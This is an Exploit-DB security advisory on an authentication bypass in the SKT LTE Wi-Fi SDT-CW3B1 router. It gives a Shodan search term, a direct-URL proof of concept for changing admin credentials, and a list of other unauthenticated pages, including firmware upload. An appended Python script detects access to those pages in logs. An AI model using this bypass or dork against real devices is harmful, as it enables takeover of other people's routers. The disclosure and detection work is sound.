SKT LTE Wi-Fi SDT-CW3B1 – Unauthorized Admin Credential Change

  • Author: Safak Aslan
    Date: 2018-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44736/
  • # Exploit Title: SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change
    # Shodan Dork: SDT-CW3B1
    # Date: 2018-05-23
    # Exploit Author: Safak Aslan
    # Vendor Homepage: http://telesquare.co.kr/
    # Version: SKT CW3B1 sw version 1.2.0
    # Tested on: Windows
    # CVE: -
     
    # Class: Unauthorized Admin Credential Change
    # Impact: The attacker can access, change and remove the admin's credentials and sensitive data on the device.
    # Remotely Exploitable: Yes
    # Authentication Required: No
     
    # Vulnerability Description
    
    /admin/management.shtml --> System Management access without authentication
    
    # By requesting /admin/management.shtml directly, it is possible to open System Management without authentication.
    # From that page the attacker can change the User ID and Password for the General User
    # and the User ID and Password for the Admin.
    
    # Proof-of-Concept
    
    http://targetIP/admin/management.shtml 
    
    
    # Additional Info
    
    Additionally, the following pages can be reached without authorization:
    /admin/upload_firmware.shtml (Router firmware and LTE firmware upgrade)
    /internet/wan.shtml (WAN settings info leak)
    /index.html (Version and status info leak)
    /nas/ftpsrv.shtml (FTP settings)
    /wifi2g/basic.shtml (Wireless settings)
    /admin/status.shtml (Access point status info leak)
    /internet/lan.shtml (LAN settings info leak)
    /admin/statistic.shtml (System statistics info leak)
    /serial/serial_direct.shtml (Direct serial settings)
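
Detection logic for the pages listed above, added here as an example and not part of the original advisory: it triages HTTP request logs for hits on the unauthenticated pages that come from outside a management subnet. The Common Log Format input, the 192.0.2.0/24 management range, the severity labels and all sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from posixpath import normpath
from urllib.parse import unquote

# Pages the advisory lists as unauthenticated (/index.html omitted: too noisy).
STATE_CHANGING = {"/admin/management.shtml", "/admin/upload_firmware.shtml"}
INFO_LEAK = {
    "/internet/wan.shtml", "/internet/lan.shtml", "/nas/ftpsrv.shtml",
    "/wifi2g/basic.shtml", "/admin/status.shtml", "/admin/statistic.shtml",
    "/serial/serial_direct.shtml",
}
# Assumed input: Common Log Format lines whose first field is an IP address.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def canonical(target):
    """Strip the query, percent-decode and collapse //, ./ and ../ segments."""
    path = unquote(target.split("?", 1)[0])
    return normpath(re.sub(r"/+", "/", path))

def classify(line, mgmt_net):
    """Return (severity, src, method, path), or None if nothing to report."""
    m = CLF.match(line)
    if not m:
        return None
    src, method, target, status = m.groups()
    path = canonical(target)
    if path not in STATE_CHANGING | INFO_LEAK:
        return None
    if ipaddress.ip_address(src) in mgmt_net:
        return None  # expected administration traffic
    if not status.startswith("2"):
        severity = "low"  # page was requested but not served
    elif path in STATE_CHANGING:
        severity = "critical" if method == "POST" else "high"
    else:
        severity = "medium"
    return severity, src, method, path

def triage(lines, mgmt_cidr):
    net = ipaddress.ip_network(mgmt_cidr)
    return [hit for hit in (classify(l, net) for l in lines) if hit]

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/May/2018:10:00:01 +0000] "GET /admin/management.shtml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/May/2018:10:02:40 +0000] "POST /admin/management.shtml HTTP/1.1" 200 312',
    '198.51.100.4 - - [23/May/2018:10:05:00 +0000] "GET /internet//wan.shtml?x=1 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [23/May/2018:10:05:02 +0000] "GET /admin/status.shtml HTTP/1.1" 401 0',
]
```

Calling `triage(SAMPLE, "192.0.2.0/24")` returns one critical, one medium and one low finding; the request from inside the management range is not reported.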